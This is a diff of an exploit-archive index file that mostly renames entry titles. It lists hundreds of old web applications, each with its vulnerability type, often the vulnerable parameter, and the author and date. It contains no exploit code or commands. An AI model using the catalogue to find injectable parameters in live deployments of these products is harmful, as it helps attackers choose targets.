-6487,platforms/php/webapps/6487.txt,"CYASK 3.x - (collect.php neturl) Local File Disclosure",2008-09-18,xy7,php,webapps,0
-6488,platforms/php/webapps/6488.txt,"Diesel Joke Site - 'picture_category.php id' SQL Injection",2008-09-18,SarBoT511,php,webapps,0
-6489,platforms/php/webapps/6489.txt,"ProActive CMS - 'template' Local File Inclusion",2008-09-18,r45c4l,php,webapps,0
+6483,platforms/php/webapps/6483.txt,"E-PHP CMS - 'article.php' SQL Injection",2008-09-18,HaCkeR_EgY,php,webapps,0
+6485,platforms/php/webapps/6485.txt,"addalink 4 - 'category_id' Parameter SQL Injection",2008-09-18,ka0x,php,webapps,0
+6486,platforms/php/webapps/6486.txt,"ProArcadeScript 1.3 - 'random' Parameter SQL Injection",2008-09-18,SuNHouSe2,php,webapps,0
+6487,platforms/php/webapps/6487.txt,"CYASK 3.x - 'neturl' Parameter Local File Disclosure",2008-09-18,xy7,php,webapps,0
+6488,platforms/php/webapps/6488.txt,"Diesel Joke Site - 'picture_category.php' SQL Injection",2008-09-18,SarBoT511,php,webapps,0
+6489,platforms/php/webapps/6489.txt,"ProActive CMS - 'template' Parameter Local File Inclusion",2008-09-18,r45c4l,php,webapps,0
 6490,platforms/php/webapps/6490.txt,"AssetMan 2.5-b - SQL Injection using Session Fixation Attack",2008-09-18,"Neo Anderson",php,webapps,0
 6492,platforms/php/webapps/6492.php,"Pluck CMS 4.5.3 - 'update.php' Remote File Corruption Exploit",2008-09-19,Nine:Situations:Group,php,webapps,0
 6494,platforms/php/webapps/6494.txt,"easyLink 1.1.0 - 'detail.php' SQL Injection",2008-09-19,"Egypt Coder",php,webapps,0
@@ -19470,19 +19480,19 @@ id,file,description,date,author,platform,type,port
 6499,platforms/php/webapps/6499.txt,"Advanced Electron Forum 1.0.6 - Remote Code Execution",2008-09-20,"GulfTech Security",php,webapps,0
 6500,platforms/php/webapps/6500.txt,"Explay CMS 2.1 - Insecure Cookie Handling",2008-09-20,Stack,php,webapps,0
 6501,platforms/php/webapps/6501.txt,"MyFWB 1.0 - 'index.php' SQL Injection",2008-09-20,0x90,php,webapps,0
-6502,platforms/php/webapps/6502.txt,"Diesel Pay Script - (area) SQL Injection",2008-09-20,ZoRLu,php,webapps,0
-6503,platforms/php/webapps/6503.txt,"Plaincart 1.1.2 - (p) SQL Injection",2008-09-20,r45c4l,php,webapps,0
-6504,platforms/php/webapps/6504.txt,"Oceandir 2.9 - (show_vote.php id) SQL Injection",2008-09-20,"JEEN HACKER TEAM",php,webapps,0
-6505,platforms/php/webapps/6505.txt,"jPORTAL 2 - 'humor.php id' SQL Injection",2008-09-20,r45c4l,php,webapps,0
+6502,platforms/php/webapps/6502.txt,"Diesel Pay Script - 'area' Parameter SQL Injection",2008-09-20,ZoRLu,php,webapps,0
+6503,platforms/php/webapps/6503.txt,"Plaincart 1.1.2 - 'p' Parameter SQL Injection",2008-09-20,r45c4l,php,webapps,0
+6504,platforms/php/webapps/6504.txt,"Oceandir 2.9 - 'show_vote.php' SQL Injection",2008-09-20,"JEEN HACKER TEAM",php,webapps,0
+6505,platforms/php/webapps/6505.txt,"jPORTAL 2 - 'humor.php' SQL Injection",2008-09-20,r45c4l,php,webapps,0
 6507,platforms/php/webapps/6507.php,"Invision Power Board 2.3.5 - SQL Injection",2008-09-21,waraxe,php,webapps,0
 6508,platforms/php/webapps/6508.txt,"Basic PHP Events Lister 1.0 - SQL Injection",2008-09-21,0x90,php,webapps,0
 6509,platforms/cgi/webapps/6509.txt,"TWiki 4.2.2 - 'action' Remote Code Execution",2008-09-21,webDEViL,cgi,webapps,0
 6510,platforms/php/webapps/6510.txt,"PHPKB 1.5 Professional - Multiple SQL Injections",2008-09-21,d3v1l,php,webapps,0
 6511,platforms/php/webapps/6511.txt,"6rbScript 3.3 - 'singerid' Parameter SQL Injection",2008-09-21,"Hussin X",php,webapps,0
-6512,platforms/php/webapps/6512.txt,"Diesel Job Site - (job_id) Blind SQL Injection",2008-09-21,Stack,php,webapps,0
+6512,platforms/php/webapps/6512.txt,"Diesel Job Site - 'job_id' Parameter Blind SQL Injection",2008-09-21,Stack,php,webapps,0
 6513,platforms/php/webapps/6513.txt,"Rianxosencabos CMS 0.9 - Arbitrary Add Admin",2008-09-21,"CWH Underground",php,webapps,0
 6514,platforms/php/webapps/6514.txt,"AvailScript Jobs Portal Script - Authenticated Arbitrary File Upload",2008-09-21,InjEctOr5,php,webapps,0
-6516,platforms/php/webapps/6516.txt,"e107 Plugin Image Gallery 0.9.6.2 - (image) SQL Injection",2008-09-21,boom3rang,php,webapps,0
+6516,platforms/php/webapps/6516.txt,"e107 Plugin Image Gallery 0.9.6.2 - SQL Injection",2008-09-21,boom3rang,php,webapps,0
 6517,platforms/php/webapps/6517.txt,"Netartmedia Jobs Portal 1.3 - Multiple SQL Injections",2008-09-21,Encrypt3d.M!nd,php,webapps,0
 6518,platforms/php/webapps/6518.txt,"Netartmedia Real Estate Portal 1.2 - SQL Injection",2008-09-21,Encrypt3d.M!nd,php,webapps,0
 6519,platforms/php/webapps/6519.php,"PHP iCalendar 2.24 - (cookie_language) Local File Inclusion / Arbitrary File Upload",2008-09-21,EgiX,php,webapps,0
@@ -19490,41 +19500,41 @@ id,file,description,date,author,platform,type,port
 6521,platforms/php/webapps/6521.txt,"Rianxosencabos CMS 0.9 - Insecure Cookie Handling",2008-09-21,Stack,php,webapps,0
 6522,platforms/php/webapps/6522.txt,"AvailScript Article Script - 'view.php' SQL Injection",2008-09-21,"Hussin X",php,webapps,0
 6523,platforms/php/webapps/6523.php,"WCMS 1.0b - Arbitrary Add Admin",2008-09-22,"CWH Underground",php,webapps,0
-6524,platforms/php/webapps/6524.txt,"WSN Links 2.22/2.23 - (vote.php) SQL Injection",2008-09-22,d3v1l,php,webapps,0
+6524,platforms/php/webapps/6524.txt,"WSN Links 2.22/2.23 - 'vote.php' SQL Injection",2008-09-22,d3v1l,php,webapps,0
 6525,platforms/php/webapps/6525.txt,"WSN Links 2.20 - 'comments.php' SQL Injection",2008-09-22,d3v1l,php,webapps,0
 6526,platforms/php/webapps/6526.txt,"PHP iCalendar 2.24 - Insecure Cookie Handling",2008-09-22,Stack,php,webapps,0
-6527,platforms/php/webapps/6527.txt,"BuzzyWall 1.3.1 - (search.php search) SQL Injection",2008-09-22,~!Dok_tOR!~,php,webapps,0
-6528,platforms/php/webapps/6528.txt,"WCMS 1.0b - (news_detail.asp id) SQL Injection",2008-09-22,"CWH Underground",php,webapps,0
+6527,platforms/php/webapps/6527.txt,"BuzzyWall 1.3.1 - 'search' Parameter SQL Injection",2008-09-22,~!Dok_tOR!~,php,webapps,0
+6528,platforms/php/webapps/6528.txt,"WCMS 1.0b - 'news_detail.asp' SQL Injection",2008-09-22,"CWH Underground",php,webapps,0
 6529,platforms/php/webapps/6529.php,"WSN Links Free 4.0.34P - 'comments.php' Blind SQL Injection",2008-09-22,Stack,php,webapps,0
-6530,platforms/php/webapps/6530.txt,"OpenElec 3.01 - (form.php obj) Local File Inclusion",2008-09-22,dun,php,webapps,0
+6530,platforms/php/webapps/6530.txt,"OpenElec 3.01 - 'obj' Parameter Local File Inclusion",2008-09-22,dun,php,webapps,0
 6531,platforms/php/webapps/6531.txt,"MyBlog 0.9.8 - Insecure Cookie Handling",2008-09-22,Pepelux,php,webapps,0
-6533,platforms/php/webapps/6533.txt,"basebuilder 2.0.1 - (main.inc.php) Remote File Inclusion",2008-09-22,dun,php,webapps,0
-6535,platforms/php/webapps/6535.txt,"Fez 1.3/2.0 RC1 - (list.php) SQL Injection",2008-09-22,d3v1l,php,webapps,0
+6533,platforms/php/webapps/6533.txt,"basebuilder 2.0.1 - 'main.inc.php' Remote File Inclusion",2008-09-22,dun,php,webapps,0
+6535,platforms/php/webapps/6535.txt,"Fez 1.3/2.0 RC1 - 'list.php' SQL Injection",2008-09-22,d3v1l,php,webapps,0
 6536,platforms/php/webapps/6536.pl,"CJ Ultra Plus 1.0.4 - Cookie SQL Injection",2008-09-22,-SmoG-,php,webapps,0
-6538,platforms/php/webapps/6538.txt,"OpenRat 0.8-beta4 - (tpl_dir) Remote File Inclusion",2008-09-23,dun,php,webapps,0
-6539,platforms/php/webapps/6539.txt,"Sofi WebGui 0.6.3 PRE - (mod_dir) Remote File Inclusion",2008-09-23,dun,php,webapps,0
+6538,platforms/php/webapps/6538.txt,"OpenRat 0.8-beta4 - 'tpl_dir' Parameter Remote File Inclusion",2008-09-23,dun,php,webapps,0
+6539,platforms/php/webapps/6539.txt,"Sofi WebGui 0.6.3 PRE - 'mod_dir' Parameter Remote File Inclusion",2008-09-23,dun,php,webapps,0
 6540,platforms/php/webapps/6540.pl,"iGaming CMS 1.5 - Multiple SQL Injections",2008-09-23,StAkeR,php,webapps,0
 6541,platforms/php/webapps/6541.txt,"Galmeta Post CMS 0.2 - Remote Code Execution / Arbitrary File Upload",2008-09-23,GoLd_M,php,webapps,0
-6542,platforms/php/webapps/6542.txt,"JETIK-WEB Software - 'sayfa.php kat' SQL Injection",2008-09-23,d3v1l,php,webapps,0
+6542,platforms/php/webapps/6542.txt,"JETIK-WEB Software - 'kat' Parameter SQL Injection",2008-09-23,d3v1l,php,webapps,0
 6543,platforms/php/webapps/6543.txt,"Ol BookMarks Manager 0.7.5 - Local File Inclusion",2008-09-23,dun,php,webapps,0
-6544,platforms/php/webapps/6544.txt,"WebPortal CMS 0.7.4 - (code) Remote Code Execution",2008-09-23,GoLd_M,php,webapps,0
-6545,platforms/php/webapps/6545.txt,"HotScripts Clone - 'cid' SQL Injection",2008-09-24,"Hussin X",php,webapps,0
+6544,platforms/php/webapps/6544.txt,"WebPortal CMS 0.7.4 - 'code' Parameter Remote Code Execution",2008-09-23,GoLd_M,php,webapps,0
+6545,platforms/php/webapps/6545.txt,"HotScripts Clone - 'cid' Parameter SQL Injection",2008-09-24,"Hussin X",php,webapps,0
 6546,platforms/php/webapps/6546.pl,"Rianxosencabos CMS 0.9 - Remote Add Admin",2008-09-24,ka0x,php,webapps,0
 6547,platforms/php/webapps/6547.txt,"Ol BookMarks Manager 0.7.5 - Remote File Inclusion / Local File Inclusion / SQL Injection",2008-09-24,GoLd_M,php,webapps,0
 6549,platforms/php/webapps/6549.txt,"Jetik Emlak ESA 2.0 - Multiple SQL Injections",2008-09-24,ZoRLu,php,webapps,0
 6550,platforms/php/webapps/6550.txt,"AJ Auction Pro Platinum Skin - 'item_id' Parameter SQL Injection",2008-09-24,GoLd_M,php,webapps,0
-6551,platforms/php/webapps/6551.txt,"emergecolab 1.0 - (sitecode) Local File Inclusion",2008-09-24,dun,php,webapps,0
-6552,platforms/php/webapps/6552.txt,"mailwatch 1.0.4 - (docs.php doc) Local File Inclusion",2008-09-24,dun,php,webapps,0
-6553,platforms/php/webapps/6553.txt,"PHPcounter 1.3.2 - (defs.php l) Local File Inclusion",2008-09-24,dun,php,webapps,0
+6551,platforms/php/webapps/6551.txt,"emergecolab 1.0 - 'sitecode' Parameter Local File Inclusion",2008-09-24,dun,php,webapps,0
+6552,platforms/php/webapps/6552.txt,"mailwatch 1.0.4 - 'doc' Parameter Local File Inclusion",2008-09-24,dun,php,webapps,0
+6553,platforms/php/webapps/6553.txt,"PHPcounter 1.3.2 - 'defs.php' Local File Inclusion",2008-09-24,dun,php,webapps,0
 6555,platforms/php/webapps/6555.txt,"Jadu CMS for Government - 'recruit_details.php' SQL Injection",2008-09-24,r45c4l,php,webapps,0
-6556,platforms/php/webapps/6556.txt,"webcp 0.5.7 - (filelocation) Remote File Disclosure",2008-09-24,GoLd_M,php,webapps,0
+6556,platforms/php/webapps/6556.txt,"webcp 0.5.7 - 'filelocation' Parameter Remote File Disclosure",2008-09-24,GoLd_M,php,webapps,0
 6557,platforms/php/webapps/6557.txt,"ADN Forum 1.0b - Insecure Cookie Handling",2008-09-24,Pepelux,php,webapps,0
 6558,platforms/php/webapps/6558.txt,"barcodegen 2.0.0 - Local File Inclusion",2008-09-24,dun,php,webapps,0
 6559,platforms/php/webapps/6559.txt,"Observer 0.3.2.1 - Multiple Remote Command Execution Vulnerabilities",2008-09-24,dun,php,webapps,0
 6561,platforms/php/webapps/6561.txt,"AJ Auction Pro Platinum - 'seller_id' Parameter SQL Injection",2008-09-25,InjEctOr5,php,webapps,0
-6562,platforms/php/webapps/6562.txt,"LanSuite 3.3.2 - (design) Local File Inclusion",2008-09-25,dun,php,webapps,0
-6563,platforms/php/webapps/6563.txt,"PHPOCS 0.1-beta3 - (index.php act) Local File Inclusion",2008-09-25,dun,php,webapps,0
-6564,platforms/php/webapps/6564.txt,"Vikingboard 0.2 Beta - (task) Local File Inclusion",2008-09-25,dun,php,webapps,0
+6562,platforms/php/webapps/6562.txt,"LanSuite 3.3.2 - 'design' Parameter Local File Inclusion",2008-09-25,dun,php,webapps,0
+6563,platforms/php/webapps/6563.txt,"PHPOCS 0.1-beta3 - 'act' Parameter Local File Inclusion",2008-09-25,dun,php,webapps,0
+6564,platforms/php/webapps/6564.txt,"Vikingboard 0.2 Beta - 'task' Parameter Local File Inclusion",2008-09-25,dun,php,webapps,0
 6566,platforms/php/webapps/6566.txt,"PHP infoboard 7 plus - Multiple Vulnerabilities",2008-09-25,"CWH Underground",php,webapps,0
 6567,platforms/php/webapps/6567.pl,"Libra PHP File Manager 1.18/2.0 - Local File Inclusion",2008-09-25,Pepelux,php,webapps,0
 6568,platforms/php/webapps/6568.txt,"PHP infoBoard 7 - Plus Insecure Cookie Handling",2008-09-25,Stack,php,webapps,0
@@ -19533,7 +19543,7 @@ id,file,description,date,author,platform,type,port
 6572,platforms/php/webapps/6572.txt,"Atomic Photo Album 1.1.0pre4 - Cross-Site Scripting / SQL Injection",2008-09-25,d3v1l,php,webapps,0
 6573,platforms/php/webapps/6573.pl,"LanSuite 3.3.2 - 'FCKeditor' Arbitrary File Upload",2008-09-25,Stack,php,webapps,0
 6574,platforms/php/webapps/6574.php,"Atomic Photo Album 1.1.0pre4 - Blind SQL Injection",2008-09-26,Stack,php,webapps,0
-6575,platforms/php/webapps/6575.txt,"barcodegen 2.0.0 - (class_dir) Remote File Inclusion",2008-09-26,"Br0k3n H34rT",php,webapps,0
+6575,platforms/php/webapps/6575.txt,"barcodegen 2.0.0 - 'class_dir' Parameter Remote File Inclusion",2008-09-26,"Br0k3n H34rT",php,webapps,0
 6576,platforms/php/webapps/6576.txt,"Ultimate WebBoard 3.00 - (Category) SQL Injection",2008-09-26,"CWH Underground",php,webapps,0
 6577,platforms/php/webapps/6577.txt,"PromoteWeb MySQL - 'go.php id' SQL Injection",2008-09-26,"CWH Underground",php,webapps,0
 6578,platforms/php/webapps/6578.txt,"212Cafe Board 0.07 - (view.php qID) SQL Injection",2008-09-26,"CWH Underground",php,webapps,0
@@ -19563,7 +19573,7 @@ id,file,description,date,author,platform,type,port
 6607,platforms/php/webapps/6607.txt,"X7 Chat 2.0.1A1 - Local File Inclusion",2008-09-27,JIKO,php,webapps,0
 6608,platforms/php/webapps/6608.txt,"ZEELYRICS 2.0 - (bannerclick.php adid) SQL Injection",2008-09-28,"Hussin X",php,webapps,0
 6610,platforms/asp/webapps/6610.txt,"ParsaWeb CMS - 'Search' SQL Injection",2008-09-28,BugReport.IR,asp,webapps,0
-6611,platforms/php/webapps/6611.php,"PHPcounter 1.3.2 - (index.php name) SQL Injection",2008-09-28,StAkeR,php,webapps,0
+6611,platforms/php/webapps/6611.php,"PHPcounter 1.3.2 - 'index.php' SQL Injection",2008-09-28,StAkeR,php,webapps,0
 6612,platforms/php/webapps/6612.txt,"Pro Chat Rooms 3.0.3 - (guid) SQL Injection",2008-09-28,~!Dok_tOR!~,php,webapps,0
 6613,platforms/php/webapps/6613.txt,"Pilot Group eTraining - 'news_read.php id' SQL Injection",2008-09-28,S.W.A.T.,php,webapps,0
 6617,platforms/php/webapps/6617.txt,"BbZL.php 0.92 - (lien_2) Local Directory Traversal",2008-09-28,JIKO,php,webapps,0
@@ -19666,7 +19676,7 @@ id,file,description,date,author,platform,type,port
 6749,platforms/php/webapps/6749.php,"Nuked-klaN 1.7.7 / SP4.4 - Multiple Vulnerabilities",2008-10-14,"Charles Fol",php,webapps,0
 6751,platforms/php/webapps/6751.txt,"SezHoo 0.1 - (IP) Remote File Inclusion",2008-10-14,DaRkLiFe,php,webapps,0
 6754,platforms/php/webapps/6754.txt,"My PHP Dating - 'success_story.php id' SQL Injection",2008-10-14,Hakxer,php,webapps,0
-6755,platforms/php/webapps/6755.php,"PhpWebGallery 1.7.2 - Session Hijacking / Code Execution",2008-10-14,EgiX,php,webapps,0
+6755,platforms/php/webapps/6755.php,"PHPWebGallery 1.7.2 - Session Hijacking / Code Execution",2008-10-14,EgiX,php,webapps,0
 6758,platforms/php/webapps/6758.txt,"AstroSPACES - 'id' SQL Injection",2008-10-15,TurkishWarriorr,php,webapps,0
 6759,platforms/php/webapps/6759.txt,"mystats - 'hits.php' Multiple Vulnerabilities",2008-10-15,JosS,php,webapps,0
 6760,platforms/php/webapps/6760.txt,"myEvent 1.6 - (viewevent.php) SQL Injection",2008-10-15,JosS,php,webapps,0
@@ -19720,7 +19730,7 @@ id,file,description,date,author,platform,type,port
 6829,platforms/php/webapps/6829.txt,"Aj RSS Reader - 'EditUrl.php url' SQL Injection",2008-10-24,yassine_enp,php,webapps,0
 6830,platforms/php/webapps/6830.txt,"NEPT Image Uploader 1.0 - Arbitrary File Upload",2008-10-24,Dentrasi,php,webapps,0
 6833,platforms/php/webapps/6833.txt,"phpdaily - SQL Injection / Cross-Site Scripting / Local File Download",2008-10-24,0xFFFFFF,php,webapps,0
-6835,platforms/php/webapps/6835.txt,"BuzzyWall 1.3.1 - (download id) Remote File Disclosure",2008-10-24,b3hz4d,php,webapps,0
+6835,platforms/php/webapps/6835.txt,"BuzzyWall 1.3.1 - 'id' Parameter Remote File Disclosure",2008-10-24,b3hz4d,php,webapps,0
 6836,platforms/php/webapps/6836.txt,"Tlnews 2.2 - Insecure Cookie Handling",2008-10-25,x0r,php,webapps,0
 6837,platforms/php/webapps/6837.txt,"Kasra CMS - 'index.php' Multiple SQL Injection",2008-10-25,G4N0K,php,webapps,0
 6839,platforms/php/webapps/6839.txt,"PozScripts Classified Auctions - 'gotourl.php id' SQL Injection",2008-10-26,"Hussin X",php,webapps,0
@@ -19871,7 +19881,7 @@ id,file,description,date,author,platform,type,port
 7004,platforms/php/webapps/7004.txt,"Pre Simple CMS - SQL Injection (Authentication Bypass)",2008-11-05,"Hussin X",php,webapps,0
 7005,platforms/php/webapps/7005.txt,"PHP JOBWEBSITE PRO - Authentication Bypass",2008-11-05,Cyber-Zone,php,webapps,0
 7007,platforms/php/webapps/7007.txt,"Harlandscripts drinks - (recid) SQL Injection",2008-11-05,"Ex Tacy",php,webapps,0
-7008,platforms/php/webapps/7008.txt,"Pre Real Estate Listings - (Authentication Bypass) SQL Injection",2008-11-05,Cyber-Zone,php,webapps,0
+7008,platforms/php/webapps/7008.txt,"Pre Real Estate Listings - Authentication Bypass",2008-11-05,Cyber-Zone,php,webapps,0
 7009,platforms/php/webapps/7009.txt,"Mole Group Airline Ticket Script - SQL Injection",2008-11-05,InjEctOr5,php,webapps,0
 7010,platforms/php/webapps/7010.txt,"Mole Group Taxi Calc Dist Script - (Authentication Bypass) SQL Injection",2008-11-05,InjEctOr5,php,webapps,0
 7011,platforms/php/webapps/7011.pl,"Simple Machines Forum (SMF) 1.1.6 - (Local File Inclusion) Code Execution",2008-11-05,~elmysterio,php,webapps,0
@@ -20027,7 +20037,7 @@ id,file,description,date,author,platform,type,port
 7204,platforms/php/webapps/7204.txt,"MODx CMS 0.9.6.2 - Remote File Inclusion / Cross-Site Scripting",2008-11-23,RoMaNcYxHaCkEr,php,webapps,0
 7205,platforms/php/webapps/7205.txt,"Goople CMS 1.7 - Insecure Cookie Handling",2008-11-23,BeyazKurt,php,webapps,0
 7206,platforms/php/webapps/7206.txt,"PHP Classifieds Script - Remote Database Disclosure",2008-11-23,InjEctOr5,php,webapps,0
-7208,platforms/php/webapps/7208.txt,"Netartmedia Real Estate Portal 1.2 - (ad_id) SQL Injection",2008-11-24,"Hussin X",php,webapps,0
+7208,platforms/php/webapps/7208.txt,"Netartmedia Real Estate Portal 1.2 - 'ad_id' Parameter SQL Injection",2008-11-24,"Hussin X",php,webapps,0
 7210,platforms/php/webapps/7210.txt,"Goople CMS 1.7 - Arbitrary Code Execution",2008-11-24,x0r,php,webapps,0
 7211,platforms/php/webapps/7211.php,"VideoScript 3.0 <= 4.0.1.50 - Official Shell Injection",2008-11-24,G4N0K,php,webapps,0
 7212,platforms/php/webapps/7212.php,"VideoScript 3.0 <= 4.1.5.55 - Unofficial Shell Injection",2008-11-24,G4N0K,php,webapps,0
@@ -20555,7 +20565,7 @@ id,file,description,date,author,platform,type,port
 7927,platforms/php/webapps/7927.txt,"GNUBoard 4.31.04 - (09.01.30) Multiple Local+Remote Vulnerabilities",2009-01-30,make0day,php,webapps,0
 7930,platforms/php/webapps/7930.txt,"bpautosales 1.0.1 - Cross-Site Scripting / SQL Injection",2009-01-30,"Mehmet Ince",php,webapps,0
 7931,platforms/php/webapps/7931.txt,"Orca 2.0.2 - 'topic ' Cross-Site Scripting",2009-01-30,J-Hacker,php,webapps,0
-7932,platforms/php/webapps/7932.txt,"SkaLinks 1.5 - (Authentication Bypass) SQL Injection",2009-01-30,Dimi4,php,webapps,0
+7932,platforms/php/webapps/7932.txt,"SkaLinks 1.5 - Authentication Bypass",2009-01-30,Dimi4,php,webapps,0
 7933,platforms/php/webapps/7933.txt,"eVision CMS 2.0 - (field) SQL Injection",2009-01-30,darkjoker,php,webapps,0
 7936,platforms/php/webapps/7936.txt,"sma-db 0.3.12 - Remote File Inclusion / Cross-Site Scripting",2009-02-02,ahmadbady,php,webapps,0
 7938,platforms/php/webapps/7938.txt,"Flatnux 2009-01-27 - (Job fields) Cross-Site Scripting / Iframe Injection (PoC)",2009-02-02,"Alfons Luja",php,webapps,0
@@ -22096,7 +22106,7 @@ id,file,description,date,author,platform,type,port
 10800,platforms/php/webapps/10800.txt,"I-RATER Basic - Arbitrary File Upload",2009-12-30,indoushka,php,webapps,0
 10802,platforms/php/webapps/10802.txt,"PicMe 2.1.0 - Arbitrary File Upload",2009-12-30,indoushka,php,webapps,0
 10803,platforms/php/webapps/10803.txt,"UBB Threads 6.0 - Remote File Inclusion",2009-12-30,indoushka,php,webapps,0
-10805,platforms/php/webapps/10805.txt,"diesel job site 1.4 - Multiple Vulnerabilities",2009-12-30,indoushka,php,webapps,0
+10805,platforms/php/webapps/10805.txt,"Diesel Job Site 1.4 - Multiple Vulnerabilities",2009-12-30,indoushka,php,webapps,0
 10806,platforms/php/webapps/10806.txt,"LiveZilla 3.1.8.3 - Cross-Site Scripting",2009-12-30,MaXe,php,webapps,0
 10807,platforms/php/webapps/10807.txt,"XOOPS Module dictionary 2.0.18 - 'detail.php' SQL Injection",2009-12-30,Palyo34,php,webapps,0
 10808,platforms/php/webapps/10808.txt,"PHP-Fusion Mod avatar_studio - Local File Inclusion",2009-12-30,bonobug,php,webapps,0
@@ -22229,7 +22239,7 @@ id,file,description,date,author,platform,type,port
 11071,platforms/php/webapps/11071.txt,"DELTAScripts PHPClassifieds - 'rate.php' Blind SQL Injection",2010-01-08,"Hamza 'MizoZ' N.",php,webapps,0
 11075,platforms/php/webapps/11075.txt,"ProfitCode Shopping Cart - Multiple Local File Inclusion / Remote File Inclusion Vulnerabilities",2010-01-09,"Zer0 Thunder",php,webapps,0
 11076,platforms/php/webapps/11076.txt,"PPVChat - Multiple Vulnerabilities",2010-01-09,andresg888,php,webapps,0
-11080,platforms/php/webapps/11080.txt,"ProArcadeScript to Game - (game) SQL Injection",2010-01-10,Err0R,php,webapps,0
+11080,platforms/php/webapps/11080.txt,"ProArcadeScript to Game - SQL Injection",2010-01-10,Err0R,php,webapps,0
 11081,platforms/php/webapps/11081.txt,"TermiSBloG 1.0 - SQL Injections",2010-01-10,Cyber_945,php,webapps,0
 11082,platforms/php/webapps/11082.txt,"PHPCalendars - Multiple Vulnerabilities",2010-01-10,LionTurk,php,webapps,0
 11083,platforms/php/webapps/11083.txt,"phpMDJ 1.0.3 - SQL Injection",2010-01-10,"k4cp3r and Ablus",php,webapps,0
@@ -23135,7 +23145,7 @@ id,file,description,date,author,platform,type,port
 12593,platforms/php/webapps/12593.txt,"damianov.net Shoutbox - Cross-Site Scripting",2010-05-13,"Valentin Hoebel",php,webapps,0
 12594,platforms/php/webapps/12594.txt,"Joomla! Component 'com_sebercart' - 'getPic.php' Local File Disclosure",2010-05-13,AntiSecurity,php,webapps,0
 12595,platforms/php/webapps/12595.txt,"Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion",2010-05-13,"Chip d3 bi0s",php,webapps,0
-12596,platforms/php/webapps/12596.txt,"Link Bid Script - 'links.php id' SQL Injection",2010-05-14,R3d-D3V!L,php,webapps,0
+12596,platforms/php/webapps/12596.txt,"Link Bid Script - 'links.php' SQL Injection",2010-05-14,R3d-D3V!L,php,webapps,0
 12597,platforms/php/webapps/12597.txt,"Press Release Script - 'page.php id' SQL Injection",2010-05-14,R3d-D3V!L,php,webapps,0
 12598,platforms/php/webapps/12598.txt,"JE Ajax Event Calendar - Local File Inclusion",2010-05-14,Valentin,php,webapps,0
 12599,platforms/php/webapps/12599.txt,"Heaven Soft CMS 4.7 - SQL Injection",2010-05-14,PrinceofHacking,php,webapps,0
@@ -25524,7 +25534,7 @@ id,file,description,date,author,platform,type,port
 19898,platforms/php/webapps/19898.txt,"Forum Oxalis 0.1.2 - SQL Injection",2012-07-17,"Jean Pascal Pereira",php,webapps,0
 20010,platforms/php/webapps/20010.txt,"X-Cart Gold 4.5 - (products_map.php symb Parameter) Cross-Site Scripting",2012-07-21,muts,php,webapps,0
 19927,platforms/php/webapps/19927.html,"Nwahy Articles 2.2 - Cross-Site Request Forgery (Add Admin)",2012-07-18,DaOne,php,webapps,0
-19985,platforms/php/webapps/19985.txt,"NetArt Media iBoutique 4.0 - (index.php key Parameter) SQL Injection",2012-07-20,"SecPod Research",php,webapps,0
+19985,platforms/php/webapps/19985.txt,"iBoutique 4.0 - 'key' Parameter SQL Injection",2012-07-20,"SecPod Research",php,webapps,0
 20011,platforms/windows/webapps/20011.js,"SolarWinds orion network performance monitor 10.2.2 - Multiple Vulnerabilities",2012-07-21,muts,windows,webapps,0
 20029,platforms/php/webapps/20029.rb,"EGallery - Arbitrary .PHP File Upload (Metasploit)",2012-07-23,Metasploit,php,webapps,0
 20033,platforms/php/webapps/20033.py,"Dell SonicWALL Scrutinizer 9.0.1 - (statusFilter.php q Parameter) SQL Injection",2012-07-22,muts,php,webapps,0
@@ -26275,7 +26285,7 @@ id,file,description,date,author,platform,type,port
 22881,platforms/php/webapps/22881.txt,"PHP Server Monitor - Persistent Cross-Site Scripting",2012-11-21,loneferret,php,webapps,0
 22885,platforms/asp/webapps/22885.asp,"QuadComm Q-Shop 2.5 - Failure To Validate Credentials",2003-07-09,G00db0y,asp,webapps,0
 22886,platforms/php/webapps/22886.txt,"ChangshinSoft EZTrans Server - download.php Directory Traversal",2003-07-09,"SSR Team",php,webapps,0
-22887,platforms/php/webapps/22887.txt,"PHPForum 2.0 RC1 - Mainfile.php Remote File Inclusion",2003-07-10,theblacksheep,php,webapps,0
+22887,platforms/php/webapps/22887.txt,"PHPForum 2.0 RC1 - 'Mainfile.php' Remote File Inclusion",2003-07-10,theblacksheep,php,webapps,0
 22888,platforms/asp/webapps/22888.pl,"Virtual Programming VP-ASP 5.00 - shopexd.asp SQL Injection (1)",2003-07-10,"TioEuy & AresU",asp,webapps,0
 22889,platforms/asp/webapps/22889.pl,"Virtual Programming VP-ASP 5.00 - shopexd.asp SQL Injection (2)",2003-07-10,"Bosen & TioEuy",asp,webapps,0
 22895,platforms/asp/webapps/22895.txt,"ASP-DEV Discussion Forum 2.0 - Admin Directory Weak Default Permissions",2003-07-13,G00db0y,asp,webapps,0
@@ -26781,7 +26791,7 @@ id,file,description,date,author,platform,type,port
 24134,platforms/php/webapps/24134.txt,"CMS snews - SQL Injection",2013-01-15,"By onestree",php,webapps,0
 24138,platforms/php/webapps/24138.txt,"e107 Website System 0.5/0.6 - Log.php HTML Injection",2004-05-21,Chinchilla,php,webapps,0
 24139,platforms/jsp/webapps/24139.txt,"Liferay Enterprise Portal 1.x/2.x/5.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2004-05-22,"Sandeep Giri",jsp,webapps,0
-24151,platforms/php/webapps/24151.txt,"JPortal 2.2.1 - print.php SQL Injection",2004-05-28,"Maciek Wierciski",php,webapps,0
+24151,platforms/php/webapps/24151.txt,"jPORTAL 2.2.1 - 'print.php' SQL Injection",2004-05-28,"Maciek Wierciski",php,webapps,0
 24152,platforms/php/webapps/24152.txt,"Land Down Under - BBCode HTML Injection",2004-05-29,"Tim De Gier",php,webapps,0
 24153,platforms/php/webapps/24153.txt,"e107 website system 0.6 - usersettings.php avmsg Parameter Cross-Site Scripting",2004-05-29,"Janek Vind",php,webapps,0
 24154,platforms/php/webapps/24154.txt,"e107 website system 0.6 - 'email article to a friend' Feature Cross-Site Scripting",2004-05-29,"Janek Vind",php,webapps,0
@@ -27341,7 +27351,7 @@ id,file,description,date,author,platform,type,port
 25242,platforms/php/webapps/25242.txt,"Ciamos 0.9.2 - Highlight.php File Disclosure",2005-03-19,"Majid NT",php,webapps,0
 40397,platforms/aspx/webapps/40397.txt,"MuM MapEdit 3.2.6.0 - Multiple Vulnerabilities",2016-09-19,"Paul Baade and Sven Krewitt",aspx,webapps,0
